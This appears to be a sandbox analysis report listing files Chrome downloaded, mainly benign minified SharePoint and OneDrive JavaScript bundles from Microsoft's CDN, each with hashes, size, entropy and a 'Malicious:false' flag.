                              Preview:.PNG........IHDR...s...[........... cHRM..z&..............u0...`..:....p..Q<....bKGD..............pHYs...%...%.IR$.....tIME......*w..N....IDATx...gt..'./z!....`.H.z..l.r..$v&NN.L.d23..b...../..9g&.)....J.,.EV.*)...`..... ..._..o...([......3...~........\.....U ..B.!..B.!.&...@.. .....B.!..B.!....s.!..B.!..B6....B.!..B.!.l ..!..B.!..B..@(.C.!..B.!....P0..B.!..B.!d..`.!..B.!..B..B..B.!..B.!.....9..B.!..B.!...s.!..B.!..B6....B.!..B.!.l ..!..B.!..B..@(.C.!..B.!....P0..B.!..B.!d..`.!..B.!..B..B..B.!..B.!.....9..B.!..B.!...s.!..B.!..B6....B.!..B.!.l ..!..B.!..B..@(.C.!..B.!....P0..B.!..B.!d..`.!..B.!..B..B.......G..6.G.....y.....*..p...B...sL.!..x................K$..d2.................b1d2.D".. ...........@ .T*.T*.@ ..\..>.....}.L..-..biii.Kj../.....z.....T*.H$ZqL.-.\.w>... .nw.....P..L..D..o.~?.^/...@..w..u..^..b............^.p8...6..ry..,S.@...I$.A$.A".@".@,^.xG..@ ...@ ..P.?....y.2.y.D"..ry.[~.....E ..........*..B!..~~......~.Y....zo.z...0..`......B!..b~.#......@ .`
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (49570)
                              Category:downloaded
                              Size (bytes):179006
                              Entropy (8bit):5.27859486199236
                              Encrypted:false
                              SSDEEP:
                              MD5:445D99FF1A8A6D752AFE5244725BE19A
                              SHA1:399D769B5B50AEEE1716EDAD7D99BC97714722E4
                              SHA-256:F21D86A55DD89D5E071D770F494F165420555FC26E3F4A6C150F9513F5F8686A
                              SHA-512:F26FD2E9437841A44F56252C8A523CED46AC890912954DD03C2E50111A1CAE76690B199880227816FDA579AD033C40F8DDE31D1852B06048E87DDEEE7C465852
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/208.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[208],{900:(e,t,n)=>{n.d(t,{a:()=>i});var a=n(842);function i(e){return(0,a.a)(e())}}.,893:(e,t,n)=>{n.d(t,{a:()=>c,b:()=>s});var a=n(830),i=n(324),r=n(829),o=new a.a("operation",{operationTypeId:i.b,keyFacetId:i.b});function s(e){var t=e.operationTypeFacet,n=e.keyFacet;return o.serialize({operationTypeId:t.id,keyFacetId:n.id})}function c(e){var t=o.deserialize(e),n=t.keyFacetId,a=t.operationTypeId;return{keyFacet:r.a.get(n),operationTypeFacet:r.a.get(a)}}}.,894:(e,t,n)=>{n.d(t,{a:()=>l,b:()=>d,c:()=>c});var a=n("tslib_102"),i=n(829),r=n(893),o=n("odsp.util_578"),s=n(895),c=new i.a("noRegisteredHandlerError");function d(e){var t=e.operationTypeFacet,n=e.keyFacet;return new s.a({message:"There is no operation handler registered for operation type '".concat(t.id,"' of key facet '").concat(n.id,"'."),isExpected:!0,facets:(0,a.W_)({},c.pack((0,r.b)({operationTypeFacet:t,keyFacet:n})))})}var l=function(e){function
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3528)
                              Category:downloaded
                              Size (bytes):3748
                              Entropy (8bit):5.459191671494393
                              Encrypted:false
                              SSDEEP:
                              MD5:1C9E9D077523A5B602873E517B9347D8
                              SHA1:92F00DB4A4056604C1BCBCAC71834A710F89642B
                              SHA-256:6D0983E836C96B3B3E344FBC7D4618485A8108AF140317BBAB8389A916138C63
                              SHA-512:59ADCF2ABAC6E0D58EB2194AFCE243C17D9997FD5CABD1BEDFAE64041F433AD283C010F51ECEE2E032CD312CBD187B0FD6393E8EB767F3F52A84A101F8C044BF
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1131.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1131],{2837:function(e,t,n){var a=n("tslib_102"),i=n(110),r=n(2472);function o(e){return!!e.fileHandler}function s(e){return o(e)&&!!e.promoted}function c(e){return o(e)&&!!e.builtIn}function d(e){return o(e)&&!!e.hidden}var l=/^(?:data|blob|javascript):/i,u=/^(?:data|http|https):/i;function f(e){return!l.test(e)}var p={svg:!0,png1x:!0,png1_5x:!0,png2x:!0};function m(e){var t,n;if(e)for(var a in e)if(p.hasOwnProperty(a)){var i=(n=e[a])&&u.test(n)?n:void 0;i&&(t||(t={}),t[a]=i)}return t}function _(e){return{file:e.file,folder:e.folder,allowMultiSelect:e.allowMultiSelect}}var h=function(){function e(e,t){this._dataRequestor=t.dataRequestor,this._prefetchCache=t.prefetchCache,this._localFileHandlerProvider=t.localFileHandlerProvider}return e.prototype.getFileHandlerData=function(e){return(0,a.Zd)(this,void 0,void 0,function(){var t,n,l,u,p,h,b,g,v,y,S,D,I,x,C,O,w,E,A,L=this;return(0,a.qr)(this,function(k){switch
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (20986)
                              Category:downloaded
                              Size (bytes):23548
                              Entropy (8bit):5.17309660362224
                              Encrypted:false
                              SSDEEP:
                              MD5:BBA730740E46BB08095520933474994F
                              SHA1:C52B924C1DFE3F61EEA662FCFCBB52F4A4B6F5EE
                              SHA-256:ECB97C8211D225528EC1CB22794E4C32EA56C31C1F6C67B0D7F80E9D04B1C5D0
                              SHA-512:FB1F830B38968AE47D64A266469E2A17E1EBDEAB8E5862E80AF023491AD34420FE92AFDD8F6A6B33791433212479BF6F89CE012C2A5B03CD7D035B2D0C7D69ED
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/21.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[21],{543:(e,t,n)=>{n.d(t,{a:()=>o});var a=n(590),i=n("knockout-lib"),r=n(201);const o=function(e,t,n){this.key=e||"",this.content=i.observable(new a.a(n)),this.content.equalityComparer=r.c,this.schema=i.observableArray([]),this.schema.equalityComparer=r.a,this.context=i.utils.extend({},t),this.contentTypes=i.observableArray([]),this.isPlaceholder=!0,this.version=0}}.,590:(e,t,n)=>{n.d(t,{a:()=>i});var a=n(927);const i=function(e){this.items=new Array(e||0),this.groupings=null,this.partialResultRequestCount=0,this.partialResultStatus=a.a.none}}.,927:(e,t,n)=>{n.d(t,{a:()=>a});const a={none:0,waitForManualTrigger:1,loading:2,done:3}}.,319:(e,t,n)=>{n.d(t,{a:()=>r});var a=n("tslib_102"),i=n(1893);const r=function(e){function t(t){var n=e.call(this,t)||this;return n.errorType=t.errorType||i.a.unknown,n.payloads=t.payloads||{},n}return(0,a.XJ)(t,e),t}(n("odsp.util_578").wH)}.,1893:(e,t,n)=>{n.d(t,{a:()=>a});const
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (8860)
                              Category:downloaded
                              Size (bytes):17398
                              Entropy (8bit):5.24970680977477
                              Encrypted:false
                              SSDEEP:
                              MD5:BE0F1E18E40B3DA7DA87148099D44B5B
                              SHA1:C01F52308546014596CD4BF94A4BEA139542175F
                              SHA-256:8BDD9F18CCE44EE0AAD9B6ABA52B2B05FBBF544DAC0634BCD69225234F838B54
                              SHA-512:CD789CBD2C58DCC0D9A1CED06F714D61DBC4D683FA9903CE8B50594EF83A525B6E3562862B7687EB24FD31BACCB3CB21DA72E25DFCF2C48CBE846EB08652FEE8
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/67.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[67],{2445:function(e,t,n){var a;n.d(t,{a:function(){return i}}),function(e){e[e.none=0]="none",e[e.right=1]="right",e[e.flip=2]="flip",e[e.left=3]="left"}(a||(a={}));var i=a}.,2524:function(e,t,n){n.d(t,{a:function(){return v}});var a=n("fui.util_150");(0,a.pZ)([{rawString:".od-ImageFrame{display:block;position:absolute;top:0;left:0;bottom:0;right:0}"}]);var i=n(2090),r=n("tslib_102"),o=n(2089),s=n(2445),c=n("odsp.util_578"),d=n(2684),l=n(2166),u=n(1226);function f(e,t){return e===t||!e&&!t||!(!e||!t)&&e.url===t.url}(0,a.pZ)([{rawString:".od-ImageStack{display:block;position:absolute;top:0;left:0;bottom:0;right:0;overflow:hidden}.od-ImageStack-tile{display:block;position:absolute;top:0;left:0;bottom:0;right:0;opacity:0}.od-ImageStack-tile--isLoaded{opacity:1}.od-ImageStack--fade .od-ImageStack-tile--isLoaded{transition:opacity 217ms linear 50ms}"}]),n(952);var p=n(2088),m=n(2619),_=function(e){function t(t){v
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (15314)
                              Category:downloaded
                              Size (bytes):19889
                              Entropy (8bit):5.257218620508395
                              Encrypted:false
                              SSDEEP:
                              MD5:C8F2D321D88C7DD2A73D5DFECA3F8D9F
                              SHA1:340A9B8106DA930A58400DFA27B695860DA3E25E
                              SHA-256:8A110DC3F30972138D86F95B186336B6EA11F415EE24669CCBF55860DE6AA1AA
                              SHA-512:B77453937F39229A9B517604D1D103DC1589EAC0191E1DC05DA7C166F420990B6103DD307A9D0C5538006B1E2380B857CF6012D29D496575CE018DDCB16CF696
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/206.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[206],{827:(e,t,n)=>{n.d(t,{a:()=>s});var a=n("tslib_102"),i=n(38),r=n(2063),o=function(e){function t(t,n){var a=e.call(this,{webAbsoluteUrl:n.pageContext.webAbsoluteUrl,encodeWebAbsoluteUrl:n.encodeWebAbsoluteUrl})||this;return a._pageContext=n.pageContext,a._shouldEncodeWebAbsoluteUrl=n.encodeWebAbsoluteUrl,a._itemUrlHelper=n.itemUrlHelper,a}return(0,a.XJ)(t,e),t.prototype.webByUrl=function(e){return this.webByItemUrl(this._itemUrlHelper.getUrlParts(e))},t.prototype.webByItemUrl=function(e){var t=e.siteRelation,n=e.isCrossDomain,a=e.fullItemUrl,r=this;return(n||t===i.d.crossSite)&&(r=r.method("SP.RemoteWeb",a)),r.segment("web")},t.prototype.listById=function(e,t){return this.webByItemUrl(e).segment("lists").method("GetById",t)},t.prototype.clone=function(){return new t({webAbsoluteUrl:this._pageContext.webAbsoluteUrl},{pageContext:this._pageContext,itemUrlHelper:this._itemUrlHelper,encodeWebAbsoluteUrl:this.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (7246)
                              Category:downloaded
                              Size (bytes):18050
                              Entropy (8bit):5.422819543585269
                              Encrypted:false
                              SSDEEP:
                              MD5:B7239BC2F08DE115715840138EB2B8F1
                              SHA1:B9FBBDA49E887BEAEF3516BFB82C3D573F9E41C3
                              SHA-256:A41C60F02D40FA34E892E5F1259071DF9B2F86FF5C1B4728D362B8BB47436687
                              SHA-512:04F90B197437464EF226443A83F316C649EBD17089CB4DFE686A9A1D760C276FF8A4742DDBEE9E9D75EA7356136720FFCDA430D1081F22904347031FA283E9C2
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/105.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[105],{3099:function(e,t,n){n.d(t,{a:function(){return c},b:function(){return a},c:function(){return r},d:function(){return s},e:function(){return o},f:function(){return i}}),(0,n("fui.util_150").pZ)([{rawString:".commandLink_2f161199{height:32px;line-height:32px}html[dir=ltr] .commandLink_2f161199{margin-right:15px}html[dir=rtl] .commandLink_2f161199{margin-left:15px}.commandLink_2f161199 i{color:"},{theme:"primaryText",defaultValue:"#333"},{rawString:"}button.link_2f161199,label.link_2f161199{display:inline;line-height:32px;height:32px;-webkit-user-select:none;-ms-user-select:none;user-select:none}html[dir=ltr] button.link_2f161199,html[dir=ltr] label.link_2f161199{margin-left:-7px}html[dir=rtl] button.link_2f161199,html[dir=rtl] label.link_2f161199{margin-right:-7px}html[dir=ltr] button.link_2f161199,html[dir=ltr] label.link_2f161199{margin-right:15px}html[dir=rtl] button.link_2f161199,html[dir=rtl] label.l
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (32216)
                              Category:downloaded
                              Size (bytes):33691
                              Entropy (8bit):5.376153313352283
                              Encrypted:false
                              SSDEEP:
                              MD5:EB831A83919B86C4C1F08EEF359AA17D
                              SHA1:CBD629B56D4C8881B9EF50E44989A22E083B520C
                              SHA-256:DDF7BDB7EA0CB2BB8E880D332D2BA40CA6E3339280725EA09D3659B77D3A73E6
                              SHA-512:AB46E92975D22B7405FFC8351E0875325622A6BEF06F7D3CE12928686A6B4157F8CAE0AC8B20E0BF09DEE948FE28100FF56DC28C857DA131EC2D5FA1E3B895B9
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/34.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[34],{4641:function(e,t){var n=function(){function e(){this.R=0,this.G=0,this.B=0,this.A=e.maxComponent}return e.clone=function(t){return e.fromRgba(t.R,t.G,t.B,t.A)},e.equals=function(e,t){var n=!e,a=!t;return n||a?n&&a:e.R===t.R&&e.G===t.G&&e.B===t.B&&e.A===t.A},e.fromRgba=function(t,n,a,i){var r=new e;return r.R=Math.round(t),r.G=Math.round(n),r.B=Math.round(a),r.A=null!=i?Math.round(i):e.maxComponent,r},e.fromRgbaString=function(t){var n=new e;if(/^rgb.+/.test(t)){var a=t.match(/[\d.]+/g);n=e.fromRgba(Number(a[0]),Number(a[1]),Number(a[2]),4===a.length?Number(a[3])*e.maxComponent:null)}return n},e.fromHtmlColor=function(t){function n(e,t,n){return parseInt(e.charAt(t)+e.charAt(n),16)}var a=new e;if("string"==typeof t&&"#"===t.charAt(0))switch(t.length){case 9:a.A=n(t,1,2),a.R=n(t,3,4),a.G=n(t,5,6),a.B=n(t,7,8);break;case 7:a.R=n(t,1,2),a.G=n(t,3,4),a.B=n(t,5,6);break;case 4:a.R=n(t,1,1),a.G=n(t,2,2),a.B=n(
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                              Category:downloaded
                              Size (bytes):2407
                              Entropy (8bit):7.900400471609788
                              Encrypted:false
                              SSDEEP:
                              MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                              SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                              SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                              SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                              Malicious:false
                              Reputation:unknown
                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg
                              Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):87
                              Entropy (8bit):4.674522374636856
                              Encrypted:false
                              SSDEEP:
                              MD5:1629709B420FE5981924392917611397
                              SHA1:9925539FA01891AF3845AD86A3B0CA311A19AE4D
                              SHA-256:63386A3F971A5A0189426BC682D9954C68BEBAEA78124543541F81F70A05BDDC
                              SHA-512:7DA4ED173A42984C75B2A211CF4424AD3DA22E46281CDE7EFF1935DF5B1EE58EF3C3EF27F20DD61701394E74F2DAF19CA7A992A81201163A8E8C91E02528C014
                              Malicious:false
                              Reputation:unknown
                              Preview:{"errors":[{"message":"A query is required.","extensions":{"code":"EXECUTION_ERROR"}}]}
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (6979)
                              Category:downloaded
                              Size (bytes):470262
                              Entropy (8bit):5.326879588794919
                              Encrypted:false
                              SSDEEP:
                              MD5:42681C67BD57AEA4F3F056C59E80131F
                              SHA1:B82D286FF92B669DC2125975391ABE4469ED4F99
                              SHA-256:B1FB603A1D3404F792DE66A646CB2CD5984A7E7948D007BA1C9CDF50F2E42C8D
                              SHA-512:D1D574F42A89A55010B7E9E0443E3F438C119E757EAACB6A19F31688AFB0911BAD48D536D6831A0D92D8EE05F303A82E637581BB237E9BAFE18CFBD972014021
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/16.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[16,216],{844:(e,t,n)=>{n.d(t,{a:()=>o,b:()=>r,c:()=>s});var a=n(830),i=n(829),r=new i.a("errorHandler"),o=new a.a("configuration",{}).serialize({}),s=new i.a("getItemsBatchThrottle")}.,856:(e,t,n)=>{n.d(t,{a:()=>d,b:()=>l,c:()=>f,d:()=>u,e:()=>m,f:()=>p});var a={};n.r(a),n.d(a,{failed:()=>s,resolved:()=>o,unresolved:()=>r,unsupported:()=>c});var i=n(829),r="",o="resolved",s="failed",c="unsupported",d=a,l=new i.a("error");function u(e){return!e}function f(e){return!!e}var p=new i.a("resolvedAsKeyFacetFacet"),m=new i.a("requestCanary")}.,852:(e,t,n)=>{n.d(t,{a:()=>c,b:()=>l,c:()=>d});var a=n(830),i=n(324),r=n("fui.util_150"),o=n(829),s=new a.a("keyFacet",{keyFacetId:i.b});function c(e){return s.matches(e)}(0,r.bQ)(function(e){return s.serialize({keyFacetId:e.id})});var d=new o.a("preferredKeyFacet"),l=new o.a("operationHandlerConfiguration")}.,843:(e,t,n)=>{n.d(t,{a:()=>r});var a=n("tslib_102"),i=n(327),r=funct
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1873)
                              Category:downloaded
                              Size (bytes):1878
                              Entropy (8bit):5.312028204973272
                              Encrypted:false
                              SSDEEP:
                              MD5:183088D68516D08FCE72F7B69452CA66
                              SHA1:2FF23677791BFC964878B1CEE6E0A7F87F1CD3D6
                              SHA-256:D11EFD7479F9C2404C392CADDEBF1796BAE6AF369F5DFBB70AF1041792DAB590
                              SHA-512:DA65BB429A6531A92CCFE67498AB71E498F3B8B0A8720EC24AFDC5113A9F847D48980BCD42DD0834ADCAE07549BB63CD9E30DEDA7814E5B835370CE2D43D6794
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1018.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1018],{4778:function(e,t,n){n.r(t),n.d(t,{changeFolderColorOperationHandler:function(){return v}});var a=n("tslib_102"),i=n(27),r=n(227),o=n(5),s=n(113),c=n(28),d=n(388),l=n(24),u=n(153),f=n(43),p=n(211),m=n("odsp.util_578"),_=n(155),h=n(216),b=n(8),g=n(331),v=(0,i.e)()(function(e){var t=e.itemKey,n=e.options,i=(n&&Object.keys(n)||[])[0],r=((null==n?void 0:n[i])||{}).newFolderColor,s=void 0===r?"":r;return function(e){return(0,a.Zd)(void 0,void 0,void 0,function(){var n,i,r,h,v,D,I;return(0,a.qr)(this,function(x){switch(x.label){case 0:if(n=e((0,l.a)(function(e){return e.demandItem({spItemKey:b.a},t)})).spItemKey,i=n||b.a.deserialize(t),r=function(e){var t=e.rootFolder,n=e.listFullUrl,a=e.webAbsoluteUrl,i=t||new f.a(n).path;if(!a||!i)throw new m.wH({code:"MissingItemInfo",message:"Could not determine stamp color url"});return(0,p.d)({webAbsoluteUrl:a}).segment("foldercoloring").methodWithAliases("stampcolor",
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3645)
                              Category:downloaded
                              Size (bytes):3650
                              Entropy (8bit):5.2078950598366225
                              Encrypted:false
                              SSDEEP:
                              MD5:70E892D2F0A36FA705D071A1D1CB4BC3
                              SHA1:517D6B1754C26C4AFFD85AFADFC39C6F1A848D70
                              SHA-256:3C2FDBDA48EAA9913CFC39668C39716FE9B4CE3BA9D0CD6B339830CC7D2480C8
                              SHA-512:695F7EB2ACE2A21DC09068B6B4CE3948F2C9A0B5A77122676A623D457F757BE70DFC5EE20EBADFC232DD28ED0CB15D0B7D46556AFB074B94658B3F3D44A3FD10
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/253.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[253],{1052:(e,t,n)=>{n.r(t),n.d(t,{SPListDataSource:()=>d,SpListDataSourceKey:()=>l});var a=n("tslib_102"),i=n("odsp.util_578"),r=n(4),o=n(476),s=n(2063),c=n(24),d=function(e){function t(t,n){return e.call(this,{dataSourceName:"SPListDataSource"},n)||this}return(0,a.XJ)(t,e),t.prototype.renameTitle=function(e){var t=e.fieldId,n=e.newTitle,i=e.onSuccess;return(0,a.Zd)(this,void 0,void 0,function(){var e,r;return(0,a.qr)(this,function(a){return e=this.getRequestUrl(t),r=JSON.stringify({__metadata:{type:"SP.Field"},Title:n}),(0,c.b)().Telemetry.Engagement.logData({name:"SpartanList_RenameTitle"}),[2,this.dataRequestor.getData({url:e,method:"POST",qosName:"List_renameTitle",additionalPostData:r,contentType:"application/json;odata=verbose",additionalHeaders:{"X-HTTP-Method":"MERGE"}}).then(function(e){i()})]})})},t.prototype.modifyFieldProperties=function(e){var t=e.id,n=e.fieldDescription,i=e.showInFiltersPane,r=
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (11131)
                              Category:downloaded
                              Size (bytes):237929
                              Entropy (8bit):5.417169456448331
                              Encrypted:false
                              SSDEEP:
                              MD5:69A599EFAE75AF130B2F17D445B6C6A0
                              SHA1:BE344ED6C17F0AF32263E911D99E65A37F0DF9B5
                              SHA-256:FFD57C119711C5312EF72F545DB504FB478F020B41B3895704C4EA9897459D2E
                              SHA-512:29D82E81114DA901B906EEA107C4B1ADC6CE97FB0754DE7CBEBE3B3044C3B9A29447355B5CF7504BFA43C79BFDFFB27CFEA3A860108B1B0D906F0E6247B63230
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/97.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[97,107,36],{2296:(e,t,n)=>{n.d(t,{a:()=>a});var a={unsupportedBrowser:"/images/boardview/error_rocket@2x.png",unsupportedBrowserDark:"/images/boardview/error_rocket_dark.png",emptyBucket:"/images/boardview/empty_bucket_light@2x.png",emptyBucketDark:"/images/boardview/empty_bucket_dark@2x.png",emptyFilteredBucket:"/images/boardview/empty_filter_light@2x.png",emptyFilteredBucketDark:"/images/boardview/empty_filter_dark@2x.png",emptyBoardCanvas:"/images/boardview/empty_kanban_canvas@2x.png",emptyBoardCanvasDark:"/images/boardview/empty_kanban_canvas_dark@2x.png",emptyUnassignedBucketMandatoryPivot:"/images/boardview/empty_unassigned_bucket_mandatory_pivot@2x.png",emptyUnassignedBucketMandatoryPivotDark:"/images/boardview/empty_unassigned_bucket_mandatory_pivot_dark@2x.png"}}.,2298:(e,t,n)=>{function a(e,t){var n="";if(e){var a=e.indexOf("<Where>"),i=e.indexOf("</Where>");a>-1&&i>-1&&(n=e.substring(a+7,i))}return
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (40243)
                              Category:downloaded
                              Size (bytes):138448
                              Entropy (8bit):5.343197311952461
                              Encrypted:false
                              SSDEEP:
                              MD5:AE93883CCDEE8EF2D24B570D912F5CD8
                              SHA1:FBE42CF0DD7E00E27D41BEEB05BC4C23D7998D18
                              SHA-256:EC11A3BC48E99450B6228B6E8E88FE8470659420C58542E787B61226A3918F26
                              SHA-512:0EA6CF88747A5DD207E8BCEBE6B0424B9B05151A4F3F2768D4D1B7C0827409916C7AF05C4FA263C2EA192C2665EDFDC4132E579088A8C37CB23B619DD91DE6B5
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1477.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1477,25],{2780:function(e,t,n){n.d(t,{a:function(){return a}});var a={sharepoint:0,microservice:1,consumerOnedrive:2}}.,2472:function(e,t,n){n.d(t,{a:function(){return a}});var a={Schema:4}}.,2368:function(e,t){var n;!function(e){e[e.none=0]="none",e[e.htmlFileUpload=1]="htmlFileUpload",e[e.folderUpload=2]="folderUpload",e[e.downlevelUpload=3]="downlevelUpload",e[e.silverlightUpload=4]="silverlightUpload"}(n||(n={})),t.a=n}.,2692:function(e,t,n){n.d(t,{a:function(){return s}});var a=n(112),i=n(176),r={Small:"sm",Medium:"md",Large:"lg",XLarge:"xlg",XXLarge:"xxlg",XXXLarge:"xxxlg",XXXXLarge:"xxxxlg"},o={Small:480,Medium:640,Large:1024,XLarge:1366,XXLarge:1920,XXXLarge:2560,XXXXLarge:1/0},s=function(){function e(e,t){this._scope=new i.a,this._events=new(this._scope.attached(a.b))(this),this._events.on(window,"resize, orientationchange",this._onContainerResize.bind(this));var n=t.breakpoints;this._breakpoints="fu
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (34483)
                              Category:downloaded
                              Size (bytes):85351
                              Entropy (8bit):5.380953334233353
                              Encrypted:false
                              SSDEEP:
                              MD5:772CE05BBE44D5F5DEF650A10D20E400
                              SHA1:526911B78DFFC1EF85D1A9C8031557EC137221E3
                              SHA-256:BA5ED007AEB4A6DC06A01B05D0C40A400BE3AEEC71FDBD08261CD22904E37868
                              SHA-512:E566AE8917645F686A863C81DA2B8D7466597713D6826E7E5F2396046BE2E2B3CBE32C9A65FBA97919036BA4DDB69BE93088149566C8E0517DF760749825D1E7
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/240.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[240],{2033:(e,t,n)=>{n.r(t),n.d(t,{default:()=>O});var a=n("tslib_102"),i=n("react-lib"),r=n("fui.lco_35"),o=n("fui.lcoms_307"),s=n(1597),c=n(2409),d=n(1594),l=n(2410),u=n(2411);function f(e){var t=e.pageContext,n=e.getOAuthToken,r=e.rootNode,o=e.termSetId,f=e.languageTag,p=e.allowMultipleValues,m=e.onSelect,_=e.onDeselect,h=e.selectedNodes,b=e.errorCallback,g=i.useState(void 0),v=g[0],y=g[1];function S(e){b((0,c.b)(e.httpStatus))}function D(e,t){return t.type===l.a.TERM_DEPRECATED?void 0:t}i.useEffect(function(){var e=new d.a(t,n);y(e)},[]);var I=(0,a.W_)((0,a.W_)({},r),{isDisabled:!0,hideSelection:!0,ariaLabel:(0,c.g)(r.name||"",r.type)});return v?i.createElement(s.b,{selectionMode:p?"MULTIPLE_SELECT":"SINGLE_SELECT",selectedNodes:h,node:I,rootNode:I,isRootSelectable:!0,highlightedNodesMap:{},loadChildren:function(e,t){return(0,a.Zd)(this,void 0,void 0,function(){return(0,a.qr)(this,function(t){return[2,(0,
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (15079)
                              Category:downloaded
                              Size (bytes):15084
                              Entropy (8bit):5.301411733874019
                              Encrypted:false
                              SSDEEP:
                              MD5:96DA53E2996481C560C2BDD7347DB3A3
                              SHA1:060B7506C4C7ED36371C247D7A9BFDA513C49414
                              SHA-256:C9103FE57217528D2518DFDB3A6952A1BBE5FC43F93713CE59B01CBC69FB5056
                              SHA-512:9F68FAAC4438B688EA41AA4882DF89AA51A31FF8364DCA8441B6C3FFADABA47C8AE33A24DFBC45767CE15D9C09A136998805AA337E7CE3D180F91D2B588F4491
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/82.js
